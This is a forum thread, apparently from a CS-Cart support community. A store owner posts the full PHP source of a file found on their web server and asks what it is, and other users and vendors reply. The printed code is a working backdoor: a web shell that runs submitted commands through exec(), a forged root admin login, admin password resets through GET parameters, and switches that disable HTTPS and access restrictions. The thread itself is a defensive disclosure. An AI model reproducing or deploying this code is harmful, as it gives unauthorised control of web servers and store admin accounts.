[swifty]

I've recently noticed a file in the public_html folder, its name is /enterle.php and the code in it is as follows, Ive changed the password details in case it is sensitive info.

if ($_GET['mode'] == 'shell'){
echo '
<body bgcolor="black" TEXT="#FFFFFF">
<form action="sph.php?mode=shell" name="shell" method="post">
<input type="text" name="cmd" value="';
echo $_POST['cmd'];
echo '" size="50"/>&nbsp;
<input type="submit" value="POST request" />
</form>
<br /><br />
';

if ($_POST['cmd']){
exec($_POST['cmd'], $out);

foreach ($out as $k => $v){
echo "<pre>".$v."</pre>";
}
}
echo '
</body>
';
die();
}

DEFINE ('AREA', 'A');
DEFINE ('AREA_NAME' ,'admin');
define('ACCOUNT_TYPE', 'admin');

require './prepare.php';
require './init.php';

if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '-------------------';
fn_redirect(Registry::get('config.admin_index'));
}

if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'membership_id' => '0',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '------------------';
unlink('sph.php');
if (!is_file('sph.php')) {
fn_set_notification('N','Notice', 'sph.php is removed');
} else {
fn_set_notification('E', 'Error', 'sph.php is not removed!');
}
fn_redirect(Registry::get('config.admin_index'));
}

if ($_GET['mode'] == 'logout') {
$auth = array();
unset($_SESSION['auth']);
fn_redirect(Registry::get('config.admin_index'));
}

if ($_GET['mode'] == 'change_password') {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5('5894admin'));
echo "Password Changed to '5894admin'!";
}

if ($_GET['mode'] == 'restore_password' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", $_GET['passwd']);
echo "Password Restored to $_GET[passwd]!";
}

if ($_GET['mode'] == 'restore_password_md5' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5($_GET['passwd']));
echo "Password Restored to $_GET[passwd]!";
}

if ($_GET['mode'] == 'remove_https') {
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_checkout'");
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_admin'");
echo "HTTPS disabled!";
}

if ($_GET['mode'] == 'ignore_AR') {
db_query("UPDATE ?:addons SET status='D' WHERE addon='access_restrictions'");
echo "Access Restriction is disabled!";
}

if ($_GET['mode'] == 'phpinfo') {
phpinfo();
}

?>

Should i be worried about this file and what is it's purpose?
Is this a standard CsCart file?

[requincreative]

Not a standard CS-Cart file.

This looks to be a tool script used to troubleshoot common issues. Have you had anyone assist you with your site? If so, I would contact them.

[tbirnseth]

Get rid of it. It is insecure and circumvents all security in the cart. It allows a caller to change your admin password, disable access restrictions and turns off any https settings you have.

It is malware and you should change all your cPanel and FTP passwords immediately.
Would strongly suggest you also change your primary admin password and force all admin users to change their passwords upon next login.

[Alt-team]

Dear Swifty,

Delete this file without any delay. Change all passwords.

Also it is better to check your website for malware here http://sitecheck.sucuri.net/ or with the help of other services.

Best regards, Alt-team.

[eComLabs]

Similar files are used by developers to log in the admin panel, make backups and other actions. Please contact the developer who worked on your server and ask him if he forgot to delete the file after the work has been done.

[swifty]

Dear Swifty,

Delete this file without any delay. Change all passwords.

Also it is better to check your website for malware here http://sitecheck.sucuri.net/ or with the help of other services.

Best regards, Alt-team.

I've just gone over my past posts and realized the answer given by Alt Team, can i point out this code was put in and left in my public.html folder by one of your developers, (its been removed and all passwords changed) i am now concerned as to the level of professionalism as this code sounds like it should of been removed by the person or persons who put it there in the first place.

I look forward to your reply Alt Team.

[tbirnseth]

Actually, it should never be done that way at all.
You should provide ANY developer (or anyone outside your business) with an admin account you can disable and FTP credentials you can also disable or remove after work is completed. No developer should be using a direct script to modify any admin passwords or other manipulation of user credentials.

[swifty]

As they say you live and learn and as i am not a developer i put my trust in Alt Team, they were given both admin passwords and FTP credentials so alarm bells are ringing as to why the developer felt the need to use this script.

My concerns now are what else is lurking in the back ground.

[swifty]

But as i have already said i will wait and see what Alt Team reply with.

[Alt-team]

Dear Swifty,

We have sent you the PM.

Best regards, Alt-team.